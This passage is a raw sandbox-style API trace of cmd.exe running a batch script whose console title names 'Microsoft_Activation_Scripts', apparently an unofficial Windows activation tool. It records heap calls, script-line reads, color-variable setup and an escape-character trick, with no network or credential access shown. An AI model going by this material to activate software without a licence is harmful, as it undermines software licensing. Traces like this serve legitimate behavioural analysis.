(in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56ced [0176.558] GetProcessHeap () returned 0x19a8f1e0000 [0176.558] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1ffdd0 [0176.558] GetProcessHeap () returned 0x19a8f1e0000 [0176.559] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffdd0) returned 1 [0176.559] GetProcessHeap () returned 0x19a8f1e0000 [0176.559] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ff850 [0176.559] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0176.559] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0176.559] _wcsicmp (_String1="IF", _String2="set") returned -10 [0176.559] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0176.559] _wcsicmp (_String1="REM", _String2="set") returned -1 [0176.559] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0176.559] GetProcessHeap () returned 0x19a8f1e0000 [0176.559] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ff010 [0176.559] GetProcessHeap () returned 0x19a8f1e0000 [0176.559] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecae0 [0176.559] GetProcessHeap () returned 0x19a8f1e0000 [0176.559] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0f70 [0176.559] _get_osfhandle (_FileHandle=3) returned 0xac [0176.559] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56ced [0176.559] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe320, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe320*=0x1fff, lpOverlapped=0x0) returned 1 [0176.559] SetFilePointer (in: hFile=0xac, lDistanceToMove=355589, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56d05 [0176.560] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_Yellow=\"40;93m\"\"\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"_Yellow=\"40;93m\"\"\r\n\npt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 24 [0176.560] _get_osfhandle (_FileHandle=3) returned 0xac [0176.560] GetFileType (hFile=0xac) returned 0x1 [0176.560] _get_osfhandle (_FileHandle=3) returned 0xac [0176.560] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56d05 [0176.560] GetProcessHeap () returned 0x19a8f1e0000 [0176.560] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1ffdd0 [0176.560] GetProcessHeap () returned 0x19a8f1e0000 [0176.560] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffdd0) returned 1 [0176.560] GetProcessHeap () returned 0x19a8f1e0000 [0176.560] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1fe050 [0176.560] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0176.560] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0176.560] _wcsicmp (_String1="IF", _String2="set") returned -10 [0176.560] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0176.560] _wcsicmp (_String1="REM", _String2="set") returned -1 [0176.560] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0176.561] GetProcessHeap () returned 0x19a8f1e0000 [0176.561] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1fec50 [0176.561] GetProcessHeap () returned 0x19a8f1e0000 [0176.561] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecb20 [0176.561] GetProcessHeap () returned 0x19a8f1e0000 [0176.561] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0fb0 [0176.561] _get_osfhandle (_FileHandle=3) returned 0xac [0176.561] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56d05 [0176.561] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe2f0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe2f0*=0x1fff, lpOverlapped=0x0) returned 1 [0176.561] SetFilePointer (in: hFile=0xac, lDistanceToMove=355591, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56d07 [0176.561] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\nt \"_Yellow=\"40;93m\"\"\r\n\npt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 2 [0176.561] _get_osfhandle (_FileHandle=3) returned 0xac [0176.561] GetFileType (hFile=0xac) returned 0x1 [0176.561] _get_osfhandle (_FileHandle=3) returned 0xac [0176.561] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56d07 [0176.561] GetProcessHeap () returned 0x19a8f1e0000 [0176.561] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1ffdd0 [0176.561] GetProcessHeap () returned 0x19a8f1e0000 [0176.562] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffdd0) returned 1 [0176.562] _get_osfhandle (_FileHandle=3) returned 0xac [0176.562] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56d07 [0176.562] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe2f0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe2f0*=0x1fff, lpOverlapped=0x0) returned 1 [0176.562] SetFilePointer (in: hFile=0xac, lDistanceToMove=355600, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56d10 [0176.562] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="exit /b\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="exit /b\r\nlow=\"40;93m\"\"\r\n\npt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 9 [0176.562] _get_osfhandle (_FileHandle=3) returned 0xac [0176.562] GetFileType (hFile=0xac) returned 0x1 [0176.562] _get_osfhandle (_FileHandle=3) returned 0xac [0176.562] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56d10 [0176.562] GetProcessHeap () returned 0x19a8f1e0000 [0176.562] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1ffdd0 [0176.562] GetProcessHeap () returned 0x19a8f1e0000 [0176.563] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffdd0) returned 1 [0176.563] GetProcessHeap () returned 0x19a8f1e0000 [0176.563] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1fe4d0 [0176.563] _wcsicmp (_String1="FOR", _String2="exit") returned 1 [0176.563] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1 [0176.563] _wcsicmp (_String1="IF", _String2="exit") returned 4 [0176.563] _wcsicmp (_String1="IF/?", _String2="exit") returned 4 [0176.563] _wcsicmp (_String1="REM", _String2="exit") returned 13 [0176.563] _wcsicmp (_String1="REM/?", _String2="exit") returned 13 [0176.563] GetProcessHeap () returned 0x19a8f1e0000 [0176.563] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ff790 [0176.563] GetProcessHeap () returned 0x19a8f1e0000 [0176.563] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb980 [0176.563] GetProcessHeap () returned 0x19a8f1e0000 [0176.563] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec8a0 [0176.563] _get_osfhandle (_FileHandle=3) returned 0xac [0176.564] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56d10 [0176.564] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe2c0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe2c0*=0x1fff, lpOverlapped=0x0) returned 1 [0176.564] SetFilePointer (in: hFile=0xac, lDistanceToMove=355603, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x56d13 [0176.564] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\nt /b\r\nlow=\"40;93m\"\"\r\n\npt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 3 [0176.564] _get_osfhandle (_FileHandle=3) returned 0xac [0176.564] GetFileType (hFile=0xac) returned 0x1 [0176.564] _get_osfhandle (_FileHandle=3) returned 0xac [0176.564] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x56d13 [0176.564] GetProcessHeap () returned 0x19a8f1e0000 [0176.564] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1ffdd0 [0176.564] GetProcessHeap () returned 0x19a8f1e0000 [0176.564] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffdd0) returned 1 [0176.564] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0176.564] _tell (_FileHandle=3) returned 355603 [0176.564] _close (_FileHandle=3) returned 0 [0176.565] wcstol (in: _String="1", _EndPtr=0x43f9efe840, _Radix=0 | out: _EndPtr=0x43f9efe840*="") returned 1 [0176.565] wcstol (in: _String="1", _EndPtr=0x43f9efe848, _Radix=0 | out: _EndPtr=0x43f9efe848*="") returned 1 [0176.565] GetProcessHeap () returned 0x19a8f1e0000 [0176.565] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x58) returned 0x19a8f1f8820 [0176.565] GetProcessHeap () returned 0x19a8f1e0000 [0176.565] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ecb40 [0176.565] GetProcessHeap () returned 0x19a8f1e0000 [0176.565] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecc40 [0176.565] GetProcessHeap () returned 0x19a8f1e0000 [0176.565] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecd80 [0176.565] _wpopen (_Command="echo prompt $E | cmd", _Mode="rb") returned 0x7ffbed90e2a0 [0176.574] feof (_File=0x7ffbed90e2a0) returned 0 [0176.574] ferror (_File=0x7ffbed90e2a0) returned 0 [0176.575] GetProcessHeap () returned 0x19a8f1e0000 [0176.575] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x110) returned 0x19a8f1e5e10 [0176.575] fgets (in: _Buf=0x19a8f1e5e20, _MaxCount=256, _File=0x7ffbed90e2a0 | out: _Buf="Microsoft Windows [Version 10.0.10586]\r\n", _File=0x7ffbed90e2a0) returned="Microsoft Windows [Version 10.0.10586]\r\n" [0176.960] feof (_File=0x7ffbed90e2a0) returned 0 [0176.960] ferror (_File=0x7ffbed90e2a0) returned 0 [0176.960] GetProcessHeap () returned 0x19a8f1e0000 [0176.960] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5e10, Size=0x210) returned 0x19a8f1e5e10 [0176.960] GetProcessHeap () returned 0x19a8f1e0000 [0176.960] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5e10) returned 0x210 [0176.960] fgets (in: _Buf=0x19a8f1e5e48, _MaxCount=472, _File=0x7ffbed90e2a0 | out: _Buf="(c) 2016 Microsoft Corporation. All rights reserved.\r\n", _File=0x7ffbed90e2a0) returned="(c) 2016 Microsoft Corporation. All rights reserved.\r\n" [0176.960] feof (_File=0x7ffbed90e2a0) returned 0 [0176.960] ferror (_File=0x7ffbed90e2a0) returned 0 [0176.960] GetProcessHeap () returned 0x19a8f1e0000 [0176.960] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5e10, Size=0x310) returned 0x19a8f1ea4b0 [0176.960] GetProcessHeap () returned 0x19a8f1e0000 [0176.960] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea4b0) returned 0x310 [0176.960] fgets (in: _Buf=0x19a8f1ea51e, _MaxCount=674, _File=0x7ffbed90e2a0 | out: _Buf="\r\n", _File=0x7ffbed90e2a0) returned="\r\n" [0176.968] feof (_File=0x7ffbed90e2a0) returned 0 [0176.968] ferror (_File=0x7ffbed90e2a0) returned 0 [0176.968] fgets (in: _Buf=0x19a8f1ea520, _MaxCount=672, _File=0x7ffbed90e2a0 | out: _Buf="C:\\Windows\\System32>prompt $E \r\n", _File=0x7ffbed90e2a0) returned="C:\\Windows\\System32>prompt $E \r\n" [0176.972] feof (_File=0x7ffbed90e2a0) returned 0 [0176.972] ferror (_File=0x7ffbed90e2a0) returned 0 [0176.972] fgets (in: _Buf=0x19a8f1ea540, _MaxCount=640, _File=0x7ffbed90e2a0 | out: _Buf="\r\n", _File=0x7ffbed90e2a0) returned="\r\n" [0177.017] feof (_File=0x7ffbed90e2a0) returned 0 [0177.017] ferror (_File=0x7ffbed90e2a0) returned 0 [0177.017] fgets (in: _Buf=0x19a8f1ea542, _MaxCount=638, _File=0x7ffbed90e2a0 | out: _Buf="\x1b ", _File=0x7ffbed90e2a0) returned="\x1b " [0177.101] feof (_File=0x7ffbed90e2a0) returned 16 [0177.101] _pclose (in: _File=0x7ffbed90e2a0 | out: _File=0x7ffbed90e2a0) returned 0 [0177.147] GetProcessHeap () returned 0x19a8f1e0000 [0177.147] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea4b0, Size=0x11c) returned 0x19a8f1ea4b0 [0177.148] GetProcessHeap () returned 0x19a8f1e0000 [0177.148] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea4b0) returned 0x11c [0177.148] memcpy (in: _Dst=0x19a8f1ea544, _Src=0x19a8f1ea4c0, _Size=0x84 | out: _Dst=0x19a8f1ea544) returned 0x19a8f1ea544 [0177.148] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="Microsoft Windows [Version 10.0.10586]\r\n(c) 2016 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Windows\\System32>prompt $E \r\n\r\n\x1b \x18", cbMultiByte=132, lpWideCharStr=0x19a8f1ea4c0, cchWideChar=132 | out: lpWideCharStr="Microsoft Windows [Version 10.0.10586]\r\n(c) 2016 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Windows\\System32>prompt $E \r\n\r\n\x1b \x18᠀雌") returned 132 [0177.148] GetProcessHeap () returned 0x19a8f1e0000 [0177.148] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1ffdd0 [0177.148] GetProcessHeap () returned 0x19a8f1e0000 [0177.148] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ffdd0, Size=0x30) returned 0x19a8f1ffdd0 [0177.148] GetProcessHeap () returned 0x19a8f1e0000 [0177.148] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ffdd0) returned 0x30 [0177.148] GetProcessHeap () returned 0x19a8f1e0000 [0177.148] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1ffe10 [0177.148] GetProcessHeap () returned 0x19a8f1e0000 [0177.148] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ffe10, Size=0x98) returned 0x19a8f1ffe10 [0177.148] GetProcessHeap () returned 0x19a8f1e0000 [0177.148] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ffe10) returned 0x98 [0177.148] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe1c0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.149] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.149] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.149] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.149] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.149] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.149] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.149] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.149] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.149] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.149] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.149] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.149] GetProcessHeap () returned 0x19a8f1e0000 [0177.149] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x54) returned 0x19a8f1f8ac0 [0177.149] GetProcessHeap () returned 0x19a8f1e0000 [0177.149] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f8ac0, Size=0x32) returned 0x19a8f1e0bf0 [0177.150] GetProcessHeap () returned 0x19a8f1e0000 [0177.150] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0bf0) returned 0x32 [0177.150] wcsncmp (_String1="\"esc", _String2="/", _MaxCount=0x4) returned -13 [0177.150] GetProcessHeap () returned 0x19a8f1e0000 [0177.150] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3a) returned 0x19a8f1f9360 [0177.150] _wcsnicmp (_String1="\"e", _String2="/A", _MaxCount=0x2) returned -13 [0177.150] _wcsnicmp (_String1="\"e", _String2="/P", _MaxCount=0x2) returned -13 [0177.150] SetEnvironmentVariableW (lpName="esc", lpValue="Microsoft") returned 1 [0177.150] GetProcessHeap () returned 0x19a8f1e0000 [0177.150] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef750) returned 1 [0177.151] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0177.151] GetProcessHeap () returned 0x19a8f1e0000 [0177.151] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xc0a) returned 0x19a8f1ef770 [0177.151] memcpy (in: _Dst=0x19a8f1ef770, _Src=0x19a8f1eeb50, _Size=0xc0a | out: _Dst=0x19a8f1ef770) returned 0x19a8f1ef770 [0177.151] FreeEnvironmentStringsA (penv="=") returned 1 [0177.151] GetProcessHeap () returned 0x19a8f1e0000 [0177.151] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1ffec0 [0177.151] GetProcessHeap () returned 0x19a8f1e0000 [0177.151] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ffec0, Size=0x30) returned 0x19a8f1ffec0 [0177.151] GetProcessHeap () returned 0x19a8f1e0000 [0177.151] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ffec0) returned 0x30 [0177.151] GetProcessHeap () returned 0x19a8f1e0000 [0177.151] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fff00 [0177.151] GetProcessHeap () returned 0x19a8f1e0000 [0177.151] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1fff00, Size=0x68) returned 0x19a8f1fff00 [0177.151] GetProcessHeap () returned 0x19a8f1e0000 [0177.151] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1fff00) returned 0x68 [0177.151] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe1c0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.152] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.152] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.152] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.152] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.152] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.152] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.152] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.152] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.152] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.152] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.152] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.152] GetProcessHeap () returned 0x19a8f1e0000 [0177.152] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3c) returned 0x19a8f1f95e0 [0177.152] GetProcessHeap () returned 0x19a8f1e0000 [0177.152] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f95e0, Size=0x26) returned 0x19a8f1eb770 [0177.152] GetProcessHeap () returned 0x19a8f1e0000 [0177.152] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb770) returned 0x26 [0177.152] wcsncmp (_String1="\"esc", _String2="/", _MaxCount=0x4) returned -13 [0177.153] GetProcessHeap () returned 0x19a8f1e0000 [0177.153] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2e) returned 0x19a8f1e0ff0 [0177.153] _wcsnicmp (_String1="\"e", _String2="/A", _MaxCount=0x2) returned -13 [0177.153] _wcsnicmp (_String1="\"e", _String2="/P", _MaxCount=0x2) returned -13 [0177.153] SetEnvironmentVariableW (lpName="esc", lpValue="(c)") returned 1 [0177.153] GetProcessHeap () returned 0x19a8f1e0000 [0177.153] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef770) returned 1 [0177.153] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0177.153] GetProcessHeap () returned 0x19a8f1e0000 [0177.153] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xbfe) returned 0x19a8f1ef760 [0177.153] memcpy (in: _Dst=0x19a8f1ef760, _Src=0x19a8f1eeb50, _Size=0xbfe | out: _Dst=0x19a8f1ef760) returned 0x19a8f1ef760 [0177.153] FreeEnvironmentStringsA (penv="=") returned 1 [0177.153] GetProcessHeap () returned 0x19a8f1e0000 [0177.154] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0ff0) returned 1 [0177.154] GetProcessHeap () returned 0x19a8f1e0000 [0177.154] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0177.154] GetProcessHeap () returned 0x19a8f1e0000 [0177.154] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fff00) returned 1 [0177.155] GetProcessHeap () returned 0x19a8f1e0000 [0177.155] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffec0) returned 1 [0177.155] GetProcessHeap () returned 0x19a8f1e0000 [0177.155] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1ffec0 [0177.155] GetProcessHeap () returned 0x19a8f1e0000 [0177.155] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ffec0, Size=0x30) returned 0x19a8f1ffec0 [0177.155] GetProcessHeap () returned 0x19a8f1e0000 [0177.155] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ffec0) returned 0x30 [0177.155] GetProcessHeap () returned 0x19a8f1e0000 [0177.155] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fff00 [0177.156] GetProcessHeap () returned 0x19a8f1e0000 [0177.156] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1fff00, Size=0x120) returned 0x19a8f1fff00 [0177.156] GetProcessHeap () returned 0x19a8f1e0000 [0177.156] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1fff00) returned 0x120 [0177.156] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe1c0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.157] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.157] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.157] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.157] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.157] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.157] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.157] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.157] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.157] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.157] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.157] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.157] GetProcessHeap () returned 0x19a8f1e0000 [0177.157] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x98) returned 0x19a8f1eda40 [0177.158] GetProcessHeap () returned 0x19a8f1e0000 [0177.158] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eda40, Size=0x54) returned 0x19a8f1eda40 [0177.158] GetProcessHeap () returned 0x19a8f1e0000 [0177.158] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eda40) returned 0x54 [0177.158] wcsncmp (_String1="\"esc", _String2="/", _MaxCount=0x4) returned -13 [0177.158] GetProcessHeap () returned 0x19a8f1e0000 [0177.158] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x5c) returned 0x19a8f1edab0 [0177.158] _wcsnicmp (_String1="\"e", _String2="/A", _MaxCount=0x2) returned -13 [0177.158] _wcsnicmp (_String1="\"e", _String2="/P", _MaxCount=0x2) returned -13 [0177.158] SetEnvironmentVariableW (lpName="esc", lpValue="C:\\Windows\\System32>prompt") returned 1 [0177.159] GetProcessHeap () returned 0x19a8f1e0000 [0177.159] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef760) returned 1 [0177.159] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0177.160] GetProcessHeap () returned 0x19a8f1e0000 [0177.160] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xc2c) returned 0x19a8f1ef790 [0177.160] memcpy 